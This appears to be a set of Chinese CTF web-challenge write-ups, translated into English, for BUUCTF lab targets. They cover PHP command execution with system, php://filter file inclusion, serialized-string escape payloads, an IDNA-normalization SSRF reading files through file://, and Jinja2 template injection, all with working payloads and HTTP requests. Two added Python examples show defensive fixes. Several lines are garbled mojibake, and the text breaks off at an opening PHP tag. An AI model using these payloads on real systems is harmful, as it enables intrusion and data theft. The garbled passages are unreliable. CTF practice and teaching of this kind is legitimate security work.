/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=tac /flag
References
https://www.cnblogs.com/wangtanzhi/p/12246731.html
todo: many of the payloads at this link do not work.
[BSidesCF 2020]Had a bad day
Opening the page shows two buttons. After clicking one of them the URL is:
http://43f9c4eb-7b6c-405e-9dd6-2ce954420f83.node3.buuoj.cn/index.php?category=woofers
Try the php://filter pseudo-protocol:
/index.php?category=php://filter/read=convert.base64-encode/resource=index.php
Error message:
Warning: include(php://filter/read=convert.base64-encode/resource=index.php.php): failed to open stream: operation failed in /var/www/html/index.php on line 37
The program appends a .php suffix, so change the URL to:
/index.php?category=php://filter/read=convert.base64-encode/resource=index
The response is base64; decoded:
<?php
$file = $_GET['category'];
if(isset($file)) {
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")) {
include ($file . '.php');
} else {
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
So category must contain one of woofers, meowers or index (note the third test is a bare strpos(), so "index" at offset 0 would not count). Enter the URL:
/index.php?category=php://filter/convert.base64-encode/index/resource=flag
The response is base64 of flag.php, which contains the flag. index is placed in the middle of the filter chain, where PHP treats it as a filter name; unknown filters only produce a warning and are skipped, so the chain still works.
Or:
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag
Here woofers only needs to appear in the string: PHP normalizes the path before opening it, so woofers/../flag.php resolves to flag.php even though no woofers directory exists.
References
https://blog.csdn.net/EC_Carrot/article/details/111245747
Or, with index first in the chain, again as an ignored filter name:
/index.php?category=php://filter/index/convert.base64-encode/resource=flag
References
https://c0okb.github.io/2020/04/13/BSidesCF-web/#BSidesCF-2020-Had-a-bad-day
https://zhuanlan.zhihu.com/p/49206578
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
[安洵 2019]easy_serialize_php
Open the page and click the link; the source is shown:
<?php
$function = @$_GET['f'];
function filter($img){
$filter_arr = array('php','flag','php5','php4','fl1g');
$filter = '/'.implode('|',$filter_arr).'/i';
return preg_replace($filter,'',$img);
}
if($_SESSION){
unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
highlight_file('index.php');
}else if($function == 'phpinfo'){
eval('phpinfo();');
}else if($function == 'show_image'){
$userinfo = unserialize($serialize_info);
echo file_get_contents(base64_decode($userinfo['img']));
}
Enter the URL:
/index.php?f=phpinfo
This reveals:
auto_append_file d0g3_f1ag.php
So d0g3_f1ag.php is the file to read (auto_append_file includes it at the end of every script).
extract($_POST) turns every POST key into a variable with that name, which means variable overwrite: posting _SESSION[flag]=123 replaces the whole $_SESSION array, so $_SESSION["user"] and $_SESSION['function'] disappear.
A local index.php to verify this:
<?php
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
var_dump($_SESSION);
extract($_POST);
var_dump($_SESSION);
?>
Construct the request:
POST /index.php HTTP/1.1
Host: 10.50.36.45
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
_SESSION[flag]=123
10.50.36.45 is the local IPv4 address (set your own; use the LAN address rather than localhost so that Burp Suite can intercept). Response:
array(2) {
["user"]=>
string(5) "guest"
["function"]=>
NULL
}
array(1) {
["flag"]=>
string(3) "123"
}
Only _SESSION[flag]=123 remains. Without a POST body, the request:
POST /index.php HTTP/1.1
Host: 10.50.36.45
Response:
array(2) {
["user"]=>
string(5) "guest"
["function"]=>
NULL
}
array(2) {
["user"]=>
string(5) "guest"
["function"]=>
NULL
}
So extract() does overwrite variables.
References
https://crayon-xin.github.io/2018/05/21/extract变量覆盖/
Continuing with the source:
if(!$_GET['img_path']){
$_SESSION['img'] = base64_encode('guest_img.png');
}else{
$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
No known string, after sha1 and then base64_decode, yields d0g3_f1ag.php, so img_path cannot produce it; and because $_SESSION['img'] is assigned after extract(), posting _SESSION[img] directly is overwritten again. The final step is:
echo file_get_contents(base64_decode($userinfo['img']));
so plain variable overwrite cannot reach it.
Continuing with the source:
$serialize_info = filter(serialize($_SESSION));
This points to a deserialization trick: key/value escape. The serialized string is well-formed when produced, but filter() strips keywords afterwards, so the declared s:N lengths no longer match the content and the structure shifts. Here that length mismatch is used to take control of img. In some challenges the replacement makes the string longer and pushes the original trailing fields out; here the keywords are deleted, the string gets shorter, and the closing quote of a later value is consumed as part of an earlier one, so part of our data escapes into the structure.
References
https://www.cnblogs.com/wangtanzhi/p/12261610.html
We want to read d0g3_f1ag.php, whose base64 encoding is ZDBnM19mMWFnLnBocA== (20 characters); the default img value guest_img.png encodes to Z3Vlc3RfaW1nLnBuZw==. Locally:
<?php
$_SESSION["phpflag"]=';s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}';
$_SESSION["img"]='Z3Vlc3RfaW1nLnBuZw==';
echo serialize($_SESSION);
?>
ÐòÁл¯Ö®ºó½á¹ûΪ:
a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
¼üÓóÈÉ«±íʾ,ÖµÓÃÂÌÉ«±íʾ¡£¾¹ýfilter ¹ýÂ˺ó,phpflag ±»¹ýÂË,preg_replace ĬÈÏÊǽøÐÐÎÞÏÞ´ÎÌæ»»,Ö±µ½ÎÞ·¨Æ¥ÅäÕýÔò¡£
a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
After the deletion, the key declared as s:7 consumes the 7 characters ";s:48: that follow, the next token s:1:"1" becomes its value, and our s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==" becomes the second pair. The trailing ";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";} is discarded: the leading a:2 says there are only two pairs, and unserialize stops after them. So $_SESSION['img'] now holds the base64 of d0g3_f1ag.php. Having checked locally that this unserializes as intended, send the request:
_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
The page shows:
<?php
$flag = 'flag in /d0g3_fllllllag';
?>
So the flag is in /d0g3_fllllllag. Its base64 encoding also happens to be 20 characters, so the POST data becomes:
_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
Got the flag.
References
https://www.jianshu.com/p/8e8117f9fd0e
https://www.cnblogs.com/wangtanzhi/p/12261610.html
[SUCTF 2019]Pythonginx
Open the page and press F12; there is Python code:
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我艹 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我艹 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我艹 your problem? 333"
There is also a comment (not reproduced here) mentioning nginx, whose configuration file is at:
/usr/local/nginx/conf/nginx.conf
So we probably need to read the nginx configuration. The key is that the first two checks must not see suctf.cc as the host, while the last check must.
newhost.append(h.encode('idna').decode('utf-8'))
If idna is unfamiliar, a search turns up the character conversion issue. Internationalized Domain Names (IDN) are domain names made partly or wholly of non-ASCII characters (Chinese, French, Arabic, Hebrew, accented Latin letters and so on), encoded as multi-byte Unicode. In DNS they are stored as ASCII strings using Punycode.
IDNA (Internationalizing Domain Names in Applications) is the standard mechanism for handling non-ASCII characters in domain names: it takes Unicode characters and represents them with the permitted ASCII characters.
The Unicode-to-ASCII conversion is the ToASCII operation of IDNA. Each label is first normalized (nameprep: case folding plus NFKC normalization); if the result is pure ASCII it is used as-is, otherwise it is Punycode-encoded and prefixed with the ACE prefix xn--. The normalization step is what matters here: it maps compatibility characters such as ℆ (U+2106) to their ASCII equivalents, in that case "c/u".
Unicode has several normalization forms, each handled slightly differently:
- NFC: Normalization Form C, canonical decomposition followed by canonical composition.
- NFD: Normalization Form D, canonical decomposition.
- NFKC: Normalization Form KC, compatibility decomposition followed by canonical composition (the form IDNA's nameprep uses).
- NFKD: Normalization Form KD, compatibility decomposition.
Encoding the character ℆ (U+2106) with the idna codec in Python 3:
print('℆'.encode('idna'))
Result:
b'c/u'
Decoding that as UTF-8 again:
print(b'c/u'.decode('utf-8'))
Result:
c/u
References
https://xz.aliyun.com/t/6135
https://xz.aliyun.com/t/6070
A Python script to search for the Unicode characters that satisfy the checks:
from urllib.parse import urlparse,urlunsplit,urlsplit
def get_unicode():
for x in range(65536):
uni=chr(x)
url="http://suctf.c{}".format(uni)
try:
if getUrl(url):
print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
except:
pass
def getUrl(url):
url = url
host = urlparse(url).hostname
if host == 'suctf.cc':
return False
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return False
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
finalUrl = urlunsplit(parts).split(' ')[0]
host = urlparse(finalUrl).hostname
if host == 'suctf.cc':
return True
else:
return False
if __name__=="__main__":
get_unicode()
ÔËÐнá¹û:
str: ? unicode: \u2102
str: ¨G unicode: \u2105
str: ? unicode: \u2106
str: ? unicode: \u212d
str: ? unicode: \u216d
str: ? unicode: \u217d
str: ? unicode: \u24b8
str: ? unicode: \u24d2
str: C unicode: \uff23
str: c unicode: \uff43
References
Detailed walk-through of the hostname conversion: https://xz.aliyun.com/t/6070
https://www.codenong.com/cs109743728/
https://xz.aliyun.com/t/6042#toc-24
All of the above characters are turned into suctf.cc by
newhost.append(h.encode('idna').decode('utf-8'))
and so pass the last if, after which the URL is fetched:
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
So enter this URL to read the nginx configuration (℆ normalizes to c/u, so the host suctf.c℆sr becomes suctf.cc followed by the path /usr/...):
/getUrl?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf
The final finalUrl becomes:
file://suctf.cc/usr/local/nginx/conf/nginx.conf
The page shows:
server {
listen 80;
location / {
try_files $uri @app;
}
location @app {
include uwsgi_params;
uwsgi_pass unix:///tmp/uwsgi.sock;
}
location /static {
alias /app/static;
}
# location /flag {
# alias /usr/fffffflag;
# }
}
The flag path is /usr/fffffflag, so enter:
/getUrl?url=file://suctf.c℆sr/fffffflag
Got the flag.
Inspecting the variables at each stage:
from urllib.parse import urlsplit, urlparse, urlunsplit
from urllib.request import urlopen
host = "file://suctf.c℆sr/local/nginx/conf/nginx.conf"
if host == 'suctf.cc':
print("我艹 your problem? 111")
parts = list(urlsplit("file://suctf.c℆sr/local/nginx/conf/nginx.conf"))
print("parts", parts)
host = parts[1]
if host == 'suctf.cc':
print("我艹 your problem? 222 " + host)
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
print('newhost', newhost)
print('parts', parts)
print("host", host)
finalUrl = urlunsplit(parts).split(' ')[0]
print("finalUrl", finalUrl)
host = urlparse(finalUrl).hostname
print("host", host)
if host == 'suctf.cc':
print("success")
else:
print("我艹 your problem? 333")
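The following Python, an added example that is not part of the challenge or of this writeup, puts the challenge's check order beside a hardened version: the challenge validates the raw host, then normalizes it with the idna codec and fetches whatever the normalization produced; the hardened function refuses any host that normalization would rewrite and validates the exact string it is about to fetch. The function names and the http/https allow-list are assumptions. One caveat to know: since the bpo-36216 / CVE-2019-9636 fix (Python 3.7.3), urlsplit raises ValueError when a netloc's NFKC form gains a '/', '?', '#', '@' or ':', so the ℆ payload is stopped inside urlsplit on a current interpreter, while the fullwidth ｃ (U+FF43) variant, which normalizes to a plain c, still passes the challenge's checks.

```python
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOST = "suctf.cc"


def normalize_host(host):
    """The challenge's per-label IDNA step (nameprep: case folding + NFKC)."""
    return ".".join(label.encode("idna").decode("utf-8") for label in host.split("."))


def vulnerable_final_url(url):
    """Challenge order: check the raw host, then normalize, then check and fetch the result."""
    try:
        if urlsplit(url).hostname == ALLOWED_HOST:
            return None                                   # "111": honest URLs are refused
        parts = list(urlsplit(url))
        if parts[1] == ALLOWED_HOST:
            return None                                   # "222"
        parts[1] = normalize_host(parts[1])               # host may now contain '/'
        final = urlunsplit(parts).split(" ")[0]
        return final if urlsplit(final).hostname == ALLOWED_HOST else None
    except ValueError:
        # Since the bpo-36216 / CVE-2019-9636 fix (3.7.3), urlsplit refuses a netloc whose
        # NFKC form gains '/', '?', '#', '@' or ':'. The ℆ payload is stopped here.
        return "rejected by urlsplit"


def hardened_final_url(url):
    """Validate the exact host that will be fetched; never normalize after the check."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return None
    host = parts.hostname or ""
    if parts.scheme not in ("http", "https"):            # no file://, gopher://, ...
        return None
    if not host.isascii() or normalize_host(host) != host:
        return None                                       # anything IDNA would rewrite
    if host != ALLOWED_HOST or parts.username or parts.password:
        return None
    return urlunsplit(parts)                              # the same string we checked
```

The challenge's first check also shows the design is broken in both directions: a genuine http://suctf.cc/ URL is refused while the look-alike hosts are fetched. The hardened version compares the canonical form of what will be fetched against the allow-list and refuses anything that canonicalization would change, which is the general rule for any check-then-normalize pattern.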
References
https://www.codenong.com/cs109743728/
https://blog.csdn.net/qq_42812036/article/details/104291695
https://blog.csdn.net/qq_42181428/article/details/99741920
https://www.cnblogs.com/wangtanzhi/p/12181032.html
[0CTF 2016]piapiapia
Open the page; it is a login page. Scan with dirsearch:
python dirsearch.py -u http://af08cedd-14b0-4ad9-a066-ffc4837ac7b7.node3.buuoj.cn/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
mylist.txt is my own wordlist. The scan finds www.zip; download it and look at index.php:
<?php
require_once('class.php');
if($_SESSION['username']) {
header('Location: profile.php');
exit;
}
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if($user->login($username, $password)) {
$_SESSION['username'] = $username;
header('Location: profile.php');
exit;
}
else {
die('Invalid user name or password');
}
}
else {
?>
Auditing the code, every PHP file starts with if($_SESSION['username']) to check whether the user is logged in, so everything has to be done after logging in. The source contains a registration page; open it in the browser:
/register.php
Following the rules in index.php:
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
register a compliant username and password, e.g. 1234 / 1234. After registering the page shows:
Register OK!Please Login
Click the Please Login link and log in; with no profile yet, it ends up on /update.php. Its source:
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>
This takes a POST. phone and email have strict regexes. The nickname regex rejects any character other than letters, digits and underscore, but an array bypasses the check: preg_match() on an array returns false (with a warning) and strlen() returns NULL (PHP 5/7; PHP 8 throws a TypeError instead).
md5(Array()) = null
sha1(Array()) = null
ereg(pattern,Array()) = null
preg_match(pattern,Array()) = false
strcmp(Array(), "abc") = null
strpos(Array(),"abc") = null
strlen(Array()) = null
The profile.php source:
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
?>
photo is read with file_get_contents, so controlling it gives arbitrary file read. We need the flag's path; looking through the other files, config.php:
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
?>
There is a $flag variable here. It is empty in the zip, but config.php on the server is certainly filled in, so reading config.php will give the flag: we need photo to become config.php. The only place that modifies photo is /update.php, whose source is shown above.
After the POST the profile is serialized and passed to update_profile. The file starts with require_once('class.php'), so update_profile lives in class.php:
public function update_profile($username, $new_profile) {
$username = parent::filter($username);
$new_profile = parent::filter($new_profile);
$where = "username = '$username'";
return parent::update($this->table, 'profile', $new_profile, $where);
}
It calls the filter function first and only then update to store the data. filter():
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
The filter replaces every select, insert, update, delete and where in our serialized string with hacker. If a replacement changes the length, the declared s:N lengths no longer match the content and the string can escape its field. Of the five words only where (5 characters) differs in length from hacker (6), so each where we include gains one byte after filtering. Simulating locally the serialized string produced after the POST:
$profile['phone'] = '16515';
$profile['email'] = '16516';
$profile['nickname'][] = 'where";}s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5('6546456');
print_r(serialize($profile));
Output:
a:4:{s:5:"phone";s:5:"16515";s:5:"email";s:5:"16516";s:8:"nickname";a:1:{i:0;s:39:"where";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/3b4531574a3ce1a18acf558c509bd2c9";}
After filter() the where becomes hacker but s:39 stays s:39, so the final } of hacker";}s:5:"photo";s:10:"config.php";} is no longer read as part of nickname. If we include enough where that the replacements push the whole ";}s:5:"photo";s:10:"config.php";} out of the nickname string, unserialize reads photo = config.php from inside our payload, and that is what the database ends up holding. That tail is 34 characters, so we need 34 where:
$profile['phone'] = '16515';
$profile['email'] = '16516';
$profile['nickname'][] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5('6546456');
print_r(serialize($profile));
Output:
a:4:{s:5:"phone";s:5:"16515";s:5:"email";s:5:"16516";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/3b4531574a3ce1a18acf558c509bd2c9";}
Unserialized, this string gives:
array(4) {
["phone"]=>
string(5) "16515"
["email"]=>
string(5) "16516"
["nickname"]=>
array(1) {
[0]=>
string(204) "wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}"
}
["photo"]=>
string(39) "upload/3b4531574a3ce1a18acf558c509bd2c9"
}
After where is replaced by hacker, unserializing gives:
array(4) {
["phone"]=>
string(5) "16515"
["email"]=>
string(5) "16516"
["nickname"]=>
array(1) {
[0]=>
string(204) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"
}
["photo"]=>
string(10) "config.php"
}
Now photo is config.php, and the trailing
s:5:"photo";s:39:"upload/3b4531574a3ce1a18acf558c509bd2c9";}
is discarded. So posting the values from
$profile['phone'] = '16515';
$profile['email'] = '16516';
$profile['nickname'][] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5('6546456');
print_r(serialize($profile));
updates the database as required. Intercept on update.php with Burp Suite and build the POST request:
POST /update.php HTTP/1.1
Host: 2f36cbc9-7f23-4f6e-9d7f-eba47ddd89fd.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary14s0JCyoBGszyn62
Cookie: PHPSESSID=27fbeeb24fddf182d273b2339d801a69
Content-Length: 665

------WebKitFormBoundary14s0JCyoBGszyn62
Content-Disposition: form-data; name="phone"

12345678901
------WebKitFormBoundary14s0JCyoBGszyn62
Content-Disposition: form-data; name="email"

1234@qq.com
------WebKitFormBoundary14s0JCyoBGszyn62
Content-Disposition: form-data; name="nickname[]"

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
------WebKitFormBoundary14s0JCyoBGszyn62
Content-Disposition: form-data; name="photo"; filename="1234"

1234
------WebKitFormBoundary14s0JCyoBGszyn62--
Note that nickname has to be sent as an array to get past the length check. After sending, the page reports that the data was updated; then construct a GET request:
GET /profile.php HTTP/1.1
Host: 2f36cbc9-7f23-4f6e-9d7f-eba47ddd89fd.node3.buuoj.cn
Cookie: PHPSESSID=27fbeeb24fddf182d273b2339d801a69
Note the two blank lines after the Cookie header. The response contains base64-encoded data, which decodes to:
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = 'qwertyuiop';
$config['database'] = 'challenges';
$flag = 'flag{8c967b44-c6c2-4204-9790-c7f4fc6c0d20}';
?>
That gives the flag.
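The root cause above is the order of operations: update.php serializes the profile first and runs its keyword filter on the serialized text, so a replacement that changes the byte length (where, 5 bytes, becomes hacker, 6 bytes) desynchronises the s:204: length prefix from the data that follows it. The following Python script is an added example, not code from the challenge or from any writeup: it contains a minimal PHP serialize()/unserialize() for strings, integers and arrays (written here, not PHP's implementation), reproduces the profile from this page, and shows that the same filter applied before serialization leaves photo untouched.

```python
import hashlib

# Minimal PHP serialize()/unserialize() for str/int/list/dict, written for this
# example. Lengths are byte counts, as in PHP.

def php_serialize(value):
    """Serialize the way PHP's serialize() does for the supported types."""
    if isinstance(value, str):
        raw = value.encode()
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, int):
        return b'i:%d;' % value
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = b''.join(php_serialize(k) + php_serialize(v) for k, v in items)
        return b'a:%d:{%s}' % (len(value), body)
    raise TypeError(type(value))

def php_unserialize(data):
    """Parse one value; like PHP, anything after the outermost value is ignored."""
    value, _end = _parse(data, 0)
    return value

def _parse(data, pos):
    tag = data[pos:pos + 1]
    if tag == b's':
        colon = data.index(b':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                       # skip :"
        raw = data[start:start + length]        # the declared length is trusted
        if data[start + length:start + length + 2] != b'";':
            raise ValueError('bad string terminator at %d' % (start + length))
        return raw.decode(), start + length + 2
    if tag == b'i':
        end = data.index(b';', pos)
        return int(data[pos + 2:end]), end + 1
    if tag == b'a':
        colon = data.index(b':', pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                         # skip :{
        out = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            val, pos = _parse(data, pos)
            out[key] = val
        if data[pos:pos + 1] != b'}':
            raise ValueError('bad array terminator at %d' % pos)
        return out, pos + 1
    raise ValueError('unsupported tag %r at %d' % (tag, pos))

# The profile from this page (constructed here): 34 x "where" followed by a
# fake end of the nickname array and a fake photo entry.
NICKNAME = 'where' * 34 + '";}s:5:"photo";s:10:"config.php";}'
PROFILE = {
    'phone': '16515',
    'email': '16516',
    'nickname': [NICKNAME],
    'photo': 'upload/' + hashlib.md5(b'6546456').hexdigest(),
}

def keyword_filter(text):
    """The length-changing replacement the challenge applies: where -> hacker."""
    return text.replace('where', 'hacker')

def filter_after_serialize(profile):
    """Vulnerable order: serialize, then filter the serialized text."""
    serialized = php_serialize(profile).decode()
    return php_unserialize(keyword_filter(serialized).encode())

def filter_before_serialize(profile):
    """Safe order: filter each field first, so every length prefix stays correct."""
    clean = {}
    for key, val in profile.items():
        clean[key] = [keyword_filter(v) for v in val] if isinstance(val, list) else keyword_filter(val)
    return php_unserialize(php_serialize(clean))
```

With the vulnerable order, the parsed photo is config.php and the genuine photo entry is left behind as ignored trailing bytes, exactly as in the dumps above; with the safe order, nickname still contains the injected text but only as an ordinary 238-byte string, and photo keeps its upload/ path. Validating or escaping before serialization (or rejecting serialized data whose trailing bytes are not empty) is the defensive takeaway.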
References
https://blog.csdn.net/zz_Caleb/article/details/96777110
https://mayi077.gitee.io/2020/02/01/0CTF-2016-piapiapia/
https://my.oschina.net/u/4337224/blog/3356061
http://f0r4o3.net/2020/07/30/0CTF 2016 piapiapia/
https://frystal.github.io/2019/11/08/0CTF-2016-piapiapia/
https://www.cnblogs.com/20175211lyz/p/11444134.html
http://yqxiaojunjie.com/index.php/archives/171/
[WesternCTF2018]shrine
Open the page and press F12; the Flask source code appears:
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
    return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
    app.run(debug=True)
os.environ.pop() removes the named environment variable and returns its value.
References
https://www.cnblogs.com/Security-Darren/p/4179314.html
app.config['FLAG'] = os.environ.pop('FLAG')
This registers a config entry named FLAG, which is presumably the flag. Without any filtering, {{config}} would dump the whole of app.config, but this challenge blacklists ['config', 'self'] and strips parentheses.
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
ÉÏÃæÕâÐдúÂë°ÑºÚÃûµ¥ÀïÃæµÄ['config', 'self'] ±éÀú²¢ÉèΪ¿Õ¡£
²é¿´flask ¹Ù·½Îĵµ¶Ô<path:shrine> µÄ½âÊÍ:
ͨ¹ý°Ñ URL µÄÒ»²¿·Ö±ê¼ÇΪ <variable_name> ¾Í¿ÉÒÔÔÚ URL ÖÐÌí¼Ó±äÁ¿¡£±ê¼ÇµÄ ²¿·Ö»á×÷Ϊ¹Ø¼ü×Ö²ÎÊý´«µÝ¸øº¯Êý¡£Í¨¹ýʹÓà <converter:variable_name> ,¿ÉÒÔÑ¡ÔñÐԵļÓÉÏÒ»¸öת»»Æ÷,Ϊ±äÁ¿Ö¸¶¨¹æÔò¡£Çë¿´ÏÂÃæµÄÀý×Ó:
from markupsafe import escape
@app.route('/user/<username>')
def show_user_profile(username):
    return 'User %s' % escape(username)
@app.route('/post/<int:post_id>')
def show_post(post_id):
    return 'Post %d' % post_id
@app.route('/path/<path:subpath>')
def show_subpath(subpath):
    return 'Subpath %s' % escape(subpath)
References
https://dormousehole.readthedocs.io/en/latest/quickstart.html#id7
Enter the URL:
/shrine/{{2 * 2}}
It returns the correct result of the calculation, so template injection is present.
Enter the URL:
/shrine/{{url_for.__globals__}}
url_for builds the URL for a named view function; combined with __globals__, it returns every global variable visible from that function as a dictionary.
References
https://www.jianshu.com/p/413a49db21f5
The page output contains the current_app variable, which records which app we are currently in, and what we want is that app's config, so enter the URL:
/shrine/{{url_for.__globals__['current_app'].config.FLAG}}
Or:
/shrine/{{url_for.__globals__.current_app.config.FLAG}}
Replacing url_for with get_flashed_messages also yields the flag.
get_flashed_messages returns the list of flashed messages previously passed to flash() in Flask. Messages represented as string objects are added to a message queue and later retrieved by calling get_flashed_messages() (flashed messages can be retrieved only once; after retrieval they are cleared).
References
https://zhuanlan.zhihu.com/p/93746437
https://www.cnblogs.com/wangtanzhi/p/12238779.html
[WUSTCTF2020]朴实无华
Opening the page shows only the taunt "hack me" and nothing else, so scan with dirsearch:
python dirsearch.py -u http://b88f888e-4247-4b9c-bc92-01b7d5caff8a.node3.buuoj.cn/ -e * --timeout=2 -t 1 -x 400,403,404,500,503,429 -w db/mylist.txt
mylist.txt is a scanning wordlist I created myself. The scan finds /robots.txt; visiting /robots.txt gives:
User-agent: *
Disallow: /fAke_f1agggg.php
So the flag file is /fAke_f1agggg.php. Build a GET request in Burp Suite and request /fAke_f1agggg.php:
GET /fAke_f1agggg.php HTTP/1.1
Host: b88f888e-4247-4b9c-bc92-01b7d5caff8a.node3.buuoj.cn
The response is:
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 24 Apr 2021 16:56:56 GMT
Content-Type: text/html
Content-Length: 22
Connection: keep-alive
Look_at_me: /fl4g.php
X-Powered-By: PHP/5.5.38
flag{this_is_not_flag}
This reveals /fl4g.php. Visiting /fl4g.php shows garbled text; after switching the page encoding to utf-8 with the Charset browser extension, the source code appears:
<?php
